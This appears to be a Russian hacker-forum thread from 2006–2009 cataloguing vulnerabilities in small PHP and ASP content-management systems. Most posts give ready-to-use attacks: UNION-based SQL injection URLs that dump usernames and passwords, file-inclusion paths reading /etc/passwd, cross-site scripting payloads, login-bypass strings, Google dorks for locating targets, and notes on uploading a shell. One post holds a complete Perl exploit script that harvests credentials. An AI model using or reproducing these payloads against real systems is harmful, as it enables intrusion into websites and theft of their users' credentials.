Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    &
    p.w.p. author & author

    charname_change.php:
    Code:
    ...
    $guid = addslashes($_GET["guid"]);
    ...
    $sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
    ...
    mod spora author

    guild.php:
    Code:
    ...
    $_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
    ...
    include("./module/".$_GET['page'].".php");
    ...
    
    wow-ultimate author

    gilds.php:
    Code:
    ...
    if (@$_GET['guid']) {
    $guildid = addslashes($_GET['guid']);
    ...
    $query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
    ...
    
    block-center.php:
    Code:
    <?php
    if (!$menu = &$_GET['page']) 
    $menu=$main_page;
    print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
    <td width=\"100%\" valign=\"top\" align=\"center\" >";
    require_once("modules/$menu.php");
    print "</td></tr></table>";
    ?>
    MiniManager author
    дофига скулей ;) , cвн
     
    1 person likes this.
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    FGS_Studio cms
    sql inj в параметре content_id
    например на сайте производителя:
    исходники найти не удалось - колонки угадывались методом научного тыка).
    dork:
     
    2 people like this.
  3. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    FuzzyLime CMS

    FuzzyLime CMS

    SQL Иньекция:

    Code:
    http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*
    Локальный Инклуд:
    Файл:index.php :
    Уязвимый кусок кода:
    Code:
    <?php readfile($Root.$Path); ?> <---[xxx]
    <form action="application_loader.php" method="post">
    Code:
    http://site/index.php?Root=../../../../../../etc/password
    Code:
    http://index.php?Path=../../../../../../etc/password

    XSS:

    Code:
    http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    #83 OptimaPrime, 8 Jan 2009
    Last edited: 8 Jan 2009
  4. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    yBlog



    Локальный Инклуд:



    Файл:
    pc.lib.php
    Кусок уязвимого кода:

    Code:
     if (!isset($g_pc_lib_dir))
        $g_pc_lib_dir = "lib";
    
    ...
    
      $g_pc_extension = "php";
    
      if (!defined("PCLERROR_LIB"))
      {
        include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
      }
      if (!defined("PCLTRACE_LIB"))
      {
        include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");
    
    Code:
    http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00
    

    SQL Иньекция:

    Code:
    http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
    
    XSS Иньекция:
    Code:
    http://site/yblog/user.php?n=<script>alert(/xss/)</script>
    
     
    3 people like this.
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    webspell cms 4.01.02 dev

    articles.php:
    Code:
    ...
      $title = $_POST['title'];
      $message = $_POST['message'];
      $link1 = $_POST['link1'];
      $url1 = $_POST['url1'];
      $window1 = $_POST['window1'];
      $link2 = $_POST['link2'];
      $url2 = $_POST['url2'];
      $window2 = $_POST['window2'];
      $link3 = $_POST['link3'];
      $url3 = $_POST['url3'];
      $window3 = $_POST['window3'];
      $link4 = $_POST['link4'];
      $url4 = $_POST['url4'];
      $window4 = $_POST['window4'];
    [B]  $comments = $_POST['comments'];
      $articlesID = $_POST['articlesID'];[/B]
    
      safe_query("UPDATE ".PREFIX."articles SET 
         title='".mysql_escape_string($title)."',
         content='".mysql_escape_string($message)."',
         link1='".mysql_escape_string($link1)."',
         url1='".mysql_escape_string($url1)."',
         window1='".mysql_escape_string($window1)."',
         link2='".mysql_escape_string($link2)."',
         url2='".mysql_escape_string($url2)."',
         window2='".mysql_escape_string($window2)."',
         link3='".mysql_escape_string($link3)."',
         url3='".mysql_escape_string($url3)."',
         window3='".mysql_escape_string($window3)."',
         link4='".mysql_escape_string($link4)."',
         url4='".mysql_escape_string($url4)."',
         window4='".mysql_escape_string($window4)."',
         saved='1', [B]comments='$comments' WHERE articlesID='$articlesID'");[/B]
    
    whoisonline.php:
    dork:
    шелл заливается либо через squads:
    [​IMG]
    либо через шаблоны
     
    4 people like this.
  6. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Уязвимости различных CMS и скриптов

    Создал эту тему, дабы не плодить кучу тем с найдеными мной (либо не мой) уязвимостями в недоCMS и прочих интересных продуктах! =)

    Сайт производитель: http://wdt.org.ru
    Продукт: DPortal
    Версия: 1.1
    (wap-CMS)

    Локальное чтение файлов:
    XSS (Повсюду):

    Сайт производитель: http://steadycms.ru/
    Продукт: Steady-CmS
    Версия: 5.5
    (wap-CMS)

    SQL-inj

    По всему скрипту не фильтруется User-agent.
    Примерный эксплойт:
    Сайт производитель: http://linkorcms.ru/
    Продукт: LinkorCMS
    Версия: 1.2

    XSS
    Сайт производитель: www.phpmyadmin.net/
    Продукт: phpMyAdmin 2.6.1
    Версия: 2.6.1

    Расскрытие путей
     
    1 person likes this.
  7. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    Обзор уязвимостей OpenX 2.6.3
    Раскрытие путей:
    Code:
    /openx/www/api/v1/common/BaseAdvertiserService.php
    /openx/www/api/v1/common/BaseAgencyService.php
    /openx/www/api/v1/common/BaseBannerService.php
    /openx/www/api/v1/common/BaseCampaignService.php
    /openx/www/api/v1/common/BaseLogonService.php
    /openx/www/api/v1/common/BasePublisherService.php
    /openx/www/api/v1/common/BaseServiceImpl.php
    /openx/www/api/v1/common/BaseUserService.php
    /openx/www/api/v1/common/BaseZoneService.php
    /openx/www/api/v1/common/XmlRpcUtils.php
    /openx/www/api/v1/xmlrpc/AdvertiserServiceImpl.php
    /openx/www/api/v1/xmlrpc/AgencyServiceImpl.php
    /openx/www/api/v1/xmlrpc/BannerServiceImpl.php
    /openx/www/api/v1/xmlrpc/CampaignServiceImpl.php
    /openx/www/api/v1/xmlrpc/LogonServiceImpl.php
    /openx/www/api/v1/xmlrpc/PublisherServiceImpl.php
    /openx/www/api/v1/xmlrpc/UserServiceImpl.php
    /openx/www/api/v1/xmlrpc/ZoneServiceImpl.php
    /openx/www/admin/config.php
    /openx/plugins/3rdPartyServers/3rdPartyServers.php
    /openx/plugins/3rdPartyServers/adtech/adtech.plugin.php
    /openx/plugins/3rdPartyServers/atlas/atlas.plugin.php
    /openx/plugins/3rdPartyServers/bluestreak/bluestreak.plugin.php
    /openx/plugins/3rdPartyServers/cpx/cpx.plugin.php
    /openx/plugins/3rdPartyServers/doubleclick/doubleclick.plugin.php
    /openx/plugins/3rdPartyServers/eyeblaster/eyeblaster.plugin.php
    /openx/plugins/3rdPartyServers/falk/falk.plugin.php
    /openx/plugins/3rdPartyServers/google/google.plugin.php
    /openx/plugins/3rdPartyServers/kontera/kontera.plugin.php
    /openx/plugins/3rdPartyServers/max/max.plugin.php
    /openx/plugins/3rdPartyServers/mediaplex/mediaplex.plugin.php
    /openx/plugins/3rdPartyServers/tangozebra/tangozebra.plugin.php
    /openx/plugins/3rdPartyServers/tradedoubler/tradedoubler.plugin.php
    /openx/plugins/3rdPartyServers/ypn/ypn.plugin.php
    /openx/plugins/Maintenance/Maintenance.php
    /openx/plugins/authentication/Authentication.php
    /openx/plugins/authentication/cas/cas.plugin.php
    /openx/plugins/authentication/cas/OaCasClient.php
    /openx/plugins/authentication/cas/Controller/ConfirmAccount.php
    /openx/plugins/authentication/cas/Central/RpcMapper.php
    /openx/plugins/authentication/cas/Central/Cas.php
    /openx/plugins/authentication/cas/CAS/PGTStorage/pgt-db.php
    /openx/plugins/authentication/cas/CAS/PGTStorage/pgt-file.php
    /openx/plugins/authentication/cas/CAS/languages/english.php
    /openx/plugins/authentication/cas/CAS/languages/french.php
    /openx/plugins/authentication/cas/CAS/languages/german.php
    /openx/plugins/authentication/cas/CAS/languages/greek.php
    /openx/plugins/authentication/cas/CAS/languages/japanese.php
    /openx/plugins/authentication/internal/internal.plugin.php
    /openx/plugins/channelDerivation/ChannelDerivation.php
    /openx/plugins/channelDerivation/mysql/mysql.plugin.php
    /openx/plugins/channelDerivation/xmlrpc/xmlrpc.plugin.php
    /openx/plugins/deliveryLimitations/Client/Browser.delivery.php
    /openx/plugins/deliveryLimitations/Client/Browser.plugin.php
    /openx/plugins/deliveryLimitations/Client/Domain.delivery.php
    /openx/plugins/deliveryLimitations/Client/Domain.plugin.php
    /openx/plugins/deliveryLimitations/Client/Ip.delivery.php
    /openx/plugins/deliveryLimitations/Client/Ip.plugin.php
    /openx/plugins/deliveryLimitations/Client/Language.delivery.php
    /openx/plugins/deliveryLimitations/Client/Language.plugin.php
    /openx/plugins/deliveryLimitations/Client/Os.delivery.php
    /openx/plugins/deliveryLimitations/Client/Os.plugin.php
    /openx/plugins/deliveryLimitations/Client/Useragent.delivery.php
    /openx/plugins/deliveryLimitations/Client/Useragent.plugin.php
    /openx/plugins/deliveryLimitations/DeliveryLimitations.php
    /openx/plugins/deliveryLimitations/DeliveryLimitationsArrayData.php
    /openx/plugins/deliveryLimitations/DeliveryLimitationsCommaSeparatedData.php
    /openx/plugins/deliveryLimitations/DeliveryLimitationsResourceData.php
    /openx/plugins/deliveryLimitations/Geo/Areacode.delivery.php
    /openx/plugins/deliveryLimitations/Geo/Areacode.plugin.php
    /openx/plugins/deliveryLimitations/Geo/City.delivery.php
    /openx/plugins/deliveryLimitations/Geo/Organisation.delivery.php
    /openx/plugins/statisticsFieldsTargeting/statisticsFieldsTargeting.php
    /openx/plugins/statisticsFieldsTargeting/default/default.plugin.php
    /openx/plugins/statisticsFieldsDelivery/statisticsFieldsDelivery.php
    /openx/plugins/statisticsFieldsDelivery/default/default.plugin.php
    /openx/plugins/statisticsFieldsDelivery/affiliates/affiliates.plugin.php
    /openx/plugins/reports/admin/breakdown.plugin.php
    /openx/plugins/reports/Reports.php
    Узнаем версию:
    SQL Injection (Нужны права администратора):
    Code:
    /openx/www/admin/campaign-banners.php?clientid=1)+union+select+1,2,concat(us ername,0x3a,password),4,5+from+ox_users/*&campaignid=1
    Code:
    /openx/www/admin/campaign-edit.php?clientid=3)+union+select+1,2,concat(usern ame,0x3a,password),4,5+from+ox_users/*&campaignid=5
    Code:
    /openx/www/admin/banner-acl.php?clientid=1&campaignid=3&bannerid=1)+union+select+1,2,concat(username,0x3a, password),4,5,6+from+ox_users/*
    SQL Инъекции валидны только тогда когда добавлено хотя бы одна учетная запись.

    Активная XSS
    При добавлении новой учетной записи уязвимые поля: "Имя" и "Контакты".
    При добавлении нового клиента узвимы поля: "Имя", "Контакт" и "Комментарии".
    При добавлении нового сайта уязвимы поля: "URL веб-сайта", "Имя" и "Контакт"
    При добавлении новой зоны уязвимы поля: "Описание" и "Комментарий"
    При добавлении нового канала таргетинга уязвимы поля: "Имя", "Описание" и "Комментарии".
    При добавлении нового трекера уязвимы поля: "Имя" и "Описание"
    Фильтрации нет вообще.

    Пасивная XSS
    Code:
    /openx/www/admin/tracker-append.php?clientid=[CODE_XSS]&trackerid=1%27
    /openx/www/admin/advertiser-trackers.php?clientid=[CODE_XSS]
    Бояню от сюда: http://209.85.129.132/search?q=cache:yPQ62-iGZbcJ:https://forum.antichat.ru/showthread.php%3Fp%3D1038739+antichat.ru+openx
     
    6 people like this.
  8. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    производитель: kan-studio.ru
    продукт Kandidat CMS v.1.3.1
    pXSS
    всё работает при register_globals=on
    HTML:
    http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3E
    в исходнике проверяется лишь наличие куков, а на содержание пофик
    HTML:
    get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0
    Host: kandidat
    Cookie: KNcookies=123;
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Proxy-Connection: Keep-Alive
    
    
    
     
  9. iSee

    iSee Banned

    Joined:
    27 Jan 2009
    Messages:
    8
    Likes Received:
    6
    Reputations:
    1
    iPHPortal 1.37_02

    Пасивная XSS
    Code:
    http://site/user/?back_url=/" [xss code]
    http://site/user/?action=remind&back_url=/" [xss code]
    Раскрытие путей
    Code:
    http://site/forums/?action=forum_add_message&forum_id[]=
    http://site/include/func/db/common_db.inc.php?site=[]
    http://site/include/func/db/split_sql_file.inc.php?site=[]
    SQL-injection (нужны права админа)
    Code:
    http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+union+select+1,2,3,concat_ws(0x3a,user_login,user_password)+from+user+limit+0,1/*
    Автор: iSee
     
    #89 iSee, 28 Jan 2009
    Last edited: 28 Jan 2009
    1 person likes this.
  10. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PHPSlideshow
    XSS:
    Code:
    http://site/slideshow/index.php?directory=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/slideshow/index.php?directory=%3Cscript%3Edocument.location%3D%27http://forum.antichat.rua%27%3C/script%3E
    2 часа ночи,пока все:(
     
  11. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Уязвимости T-Xore [торрент портал]

    Уязвимости T-Xore [торрент портал]


    Project : T-Xore (http://bit-torrent.net.ru/7-skript-torrent-indeksatora-giganova.org.html)
    Found by: Dimi4
    Date : 03.02.09

    Auth bypass
    login.php
    Bug func:​
    PHP:
    if (isset($_POST['username'])&&isset($_POST['password'])){
        
    $result mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error());
        if (
    mysql_num_rows($result) == 0){
            
    stheader('Login Failed');
            
    login_form($_POST['username'],'Username or password incorrect.');
            
    footer();
            exit();
        }
    Username: name' OR 1=1/*
    Password: anything


    Sql-inj
    usertorrent.php
    Bug func:​
    PHP:
    $result2 mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());
    Code:
    usertorrent.php?usuario=giga'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),0x71),0x71),14,15,16,17,18,19,20,21,22+from+users/*
    Ех..дам там полной скулей.. ну нафиг
     
    5 people like this.
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    GeekLog

    Автор: faza02
    Сайт производителя: geeklog.net

    GeekLog v1.3.7sr1

    sql-inj:
    Code:
    /filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    etc..

    пассы хэшированы в md5.

    таблицы юзеров: gl_user
    колонки: username, passwd
     
    _________________________
    #92 yarbabin, 15 Feb 2009
    Last edited: 22 Feb 2009
  13. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Автор: [JavaScript]
    Сайт производителя: geeklog.net
    Респекты: faza02 за показание двига.
    Версии выше GeekLog v1.3.7sr1

    Passive XSS:
    Code:
    /filemgmt/singlefile.php?lid="><script>alert(/xss/)</script><!--
     
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Профессиональная Open Source CMS
    Сайт производителя: www.4site.ru
    SQL injection в модуле portfolio:
    Code:
    http://4site.ru/portfolio/index.shtml?s=5&i=-26+union+select+1,2,3,version(),5,6,7,8,9--
    Code:
    http://4site.ru/portfolio/index.shtml?s=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--
    SQL injection в модуле FAQ:
    Code:
    http://4site.ru/faq/index.shtml?th=-5+union+select+1,2,version(),4,5--
    После нахождения мной этих уязвимостей я наткнулся на сайт с почти аналогичным обзором багов на этом ресурсе... линк
    ---------------------------------------------------
    The End!
     
    #94 -m0rgan-, 15 Feb 2009
    Last edited: 21 Feb 2009
    1 person likes this.
  15. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit


    Code:
    #!/usr/bin/perl -w
    #===========================================================
    # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
    #===========================================================
    #
    #  ,--^----------,--------,-----,-------^--,
    #  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
    #  `+---------------------------^----------|
    #    `\_,-------, _________________________|
    #      / XXXXXX /`|     /
    #     / XXXXXX /  `\   /
    #    / XXXXXX /\______(
    #   / XXXXXX /           
    #  / XXXXXX /
    # (________(             
    #  `------'
    #
    #AUTHOR : CWH Underground
    #DATE : 29 November 2008
    #SITE : cwh.citec.us
    #
    #
    #####################################################
    #APPLICATION : Lito Lite CMS
    #DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip
    ######################################################
    #
    #Note: magic_quotes_gpc = off
    #
    #######################################################################################
    #Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
    #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
    #######################################################################################
    
    
    use LWP::UserAgent;
    use HTTP::Request;
    
    if ($#ARGV+1 != 2)
    {
       print "\n==============================================\n";
       print "    Lito Lite Remote SQL Injection Exploit   \n";
       print "                                              \n";
       print "        Discovered By CWH Underground         \n";
       print "==============================================\n";
       print "                                              \n";
       print "  ,--^----------,--------,-----,-------^--,   \n";
       print "  | |||||||||   `--------'     |          O	\n";
       print "  `+---------------------------^----------|   \n";
       print "    `\_,-------, _________________________|   \n";
       print "      / XXXXXX /`|     /                      \n";
       print "     / XXXXXX /  `\   /                       \n";
       print "    / XXXXXX /\______(                        \n";
       print "   / XXXXXX /                                 \n";
       print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
       print " (________(                                   \n";
       print "  `------'                                    \n";
       print "                                              \n"; 
       print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
       print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
       exit();
    }
    
    $target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
    $number = $ARGV[1];
    
    print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
    print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
    print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
    print "\n[+]Dump Username and Password\n";
    
    for ($start=0;$start<$number;$start++) {
    
    $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
    $res = $xpl->request($req);
    $info = $res->content;
    $count=$start+1;
    
    if ($info =~ /:::(.+):::/)
    {
    $dump=$1;
    ($username,$password)= split('::',$dump);
    printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
    }
    else { 
    	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
    	exit;
    }
    }
    
    # milw0rm.com [2008-11-29]
    http://www.milw0rm.com/exploits/7294
     
    1 person likes this.
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Max Write System


    Автор: mailbrush
    Оффсайт: http://www.webwisesage.com/maxwrite/
    Тип уязвимости: SQL Injection
    Code:
    http://www.site.com/maxwrite/diarypage.php?did=-1+{SQL Injection}
    Google Dork:
    Code:
    allinurl: diarypage.php?did=
    PS: В теме SQL Инъекции я уже выклал все, что нагуглил =)
     
  17. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Wallist v1.2 - скрипт фотогаллереи
    Уязвимость нашел: Kraneg
    SQL-Inj:
    1. при просмотре галереи в файле files/view.inc отсутствует фильтрация или вообще что то похожее на защиту от скули =(
    Уязвимый код:
    PHP:
    if(isset($_GET['pc']))
    {
    $query_pc = @mysql_query("select * from ".$separator."pod_categories where id_podcat=".$_GET['pc'].";");
    if(
    $query_pc)
    {
    //если запрос выполнен успешно
    //Ищем категорию по данной подкатегории
    $query_c= @mysql_query("select * from ".$separator."categories where id_cat=".mysql_result($query_pc,0,'id_cat').";");

    if(!
    $query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
            }

            else {
    show_error("Извените запрос на подкатегорию не выполнен, возможные причины:<li>Данного подраздела не существует<li>Не доступна база данных");}

            }
    else
    {
    $query_c= @mysql_query("select * from ".$separator."categories where id_cat=".$_GET['c'].";");
    if(!
    $query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
            }
    [....]
    $cat['name']=@mysql_result($query_c,0,'name');
    [....]
    $p_cat['name']=@mysql_result($query_pc,0,'name');
    [....]
    echo 
    "
    <table width='100%'>
    <tr><td width='50%'></td><td align=right>Раздел: "
    .$cat['name']."</td></tr>";
    if (isset(
    $p_cat)){echo "
    <tr><td width='50%'></td><td align=right>Подраздел: "
    .$p_cat['name']."</td></tr>";
    }
    echo 
    "
    </table>
    "
    ;
    Пример использования уязвимости:
    Code:
    http://localhost/wallist/?action=ShowGallery&pc=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--
    2.Отсутствие фильтрации в файле vote.php
    Уязвимый код:
    PHP:
    $user=mysql_query("select ip from rating where id_im=".$_GET['id']." and ip='".$_SERVER['REMOTE_ADDR']."';");
    $rows=mysql_num_rows($user);
    if(
    $rows>0)
    {
     echo 
    "<center><h3><font color=red>Вы уже участвовали в рейтинге по данной фотографии...";
    }
    Пример запроса:
    Голосуем за какую ни будь фотографию и далее выполняем запрос
    Code:
    http://localhost/wallist/vote.php?action=vote&rating=12&id=[ID]+and+ASCII(lower(substring(version(),1,1)))=53--
    где [ID] равен иду фотографии за которую голосовали, к примеру
    Code:
     http://localhost/wallist/vote.php??action=vote&rating=12&id=5+and+ASCII(lower(substring(version(),1,1)))=53--
    Если версия 5(ASCII = 53) то скрипт выведет Вы уже участвовали в рейтинге по данной фотографии... если другая то Спасибо что проголосовали за данную фотографию! я привел версию для примера...
    Там же к примеру никто не ограничивает нас в выставлении балов картинке, то есть максимальные 12 балов вовсе не максимальные =). К примеру выполним:
    Code:
    http://localhost/wallist/vote.php?action=vote&rating=4000000&id=4
    и поставится картинке с идом 4 - 4000000 балов =))
    3. Опять скуль =)
    Уязвимость находится в файле view_large.inc приводить код не буду почти везде он однотипный.. =\
    Пример использования:
    Code:
    http://localhost/wallist/?action=ShowGalleryFile&id=-4+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--
    XSS:
    1.Активная xss в коментариях, не фильтруется поле name(files/addcom.inc)...
    Уязвимый код:
    PHP:
     if (!preg_match("/[0-9a-z_]+@[0-9a-z_^\.]+\.[a-z]{2,3}/i"$_GET['email']))
            {

              echo 
    "<center><font color=red>Неверно введен е-mail. Введите e-mail
              в виде <i>"
    .$email."</i><br><a href='?action=ShowGalleryFile&id=".$_SESSION['id_im']."&functions=AddCom' title='Вернуться к форме'>[Вернуться к форме]</a>";
              exit();
            }

    $query_com=@mysql_query("insert into ".$separator."comment values('',".$_GET['id'].",'".$_GET['name']."','".$_GET['email']."','".htmlspecialchars($_GET['text'])."',NOW(),'');");
    2.Пасивная в скрипте vote.php:
    Уязвимый код:
    HTML:
    <b>Спасибо что проголосовали за данную фотографию!</b></font><font color='#0071FB' size=-1><br>
    Данной фотографии вы поставили: ".$_GET['rating']."
    пример:
    Code:
    http://localhost/wallist/vote.php?action=vote&rating=<script>alert()</script>&id=[ID]
    где ID картинка за которую вы еще не голосовали...

    Вобщем думаю это не все, просто это все, на что хватило меня =) стандартный префикс db_ таблица с пользователями user_name и user_password(в открытом виде) админа к сожалению там нет... он собственно в файле config.php =) так же скрипт за собой не то что не удаляет, даже не просит удалить папку install со всеми вытекающими... =\
     
    #97 Kraneg, 3 Mar 2009
    Last edited: 3 Mar 2009
    3 people like this.
  18. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Гостевая книга.
    код: http://dump.ru/file/1946627

    1. SQL inj
    бажный код:

    PHP:
    $result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc");
    не фильтруются передаваемые даные.

    exploit:
    Code:
    http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--
    татие скули почти во всех параметрах!

    2. Активная XSS.

    Ну здесь уязвимы все поля...
    вл любом из них вводим
    Code:
    "><script>alert(0x646f63756d656e742e636f6f6b6965)</script>
    и видим куки)

    Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
    ------------------------------------------------------------
    The End!
     
    #98 -m0rgan-, 4 Mar 2009
    Last edited: 4 Mar 2009
  19. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    emergocolab




    LFI

    Часть уязвимого кода:
    Code:
     if (isset($_GET["sitecode"])) {
    include ("conf/global.conf");
    $_SESSION["sitecode"]=$_GET["sitecode"];
    $_SESSION['sitefolder']='site';
    include ("conf/".strtolower($_GET["sitecode"]).".conf");
    Exp:
    Code:
    http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00
    

    SQL Inj

    Exp:
    Code:
    http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
    XSS

    Exp:http://site.ru/?pageid=<script>alert("antichat")</script>

     
    #99 [underwater], 7 Apr 2009
    Last edited: 8 Apr 2009
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Simbas CMS 2.0


    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием default.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://www.officetoweb.co.uk/demo/admin/default.asp
    username: r0' or ' 1=1--
    Password: r0' or ' 1=1--

    Демонстрация:
    http://www.officetoweb.co.uk/demo/admin/default.asp


    © Semu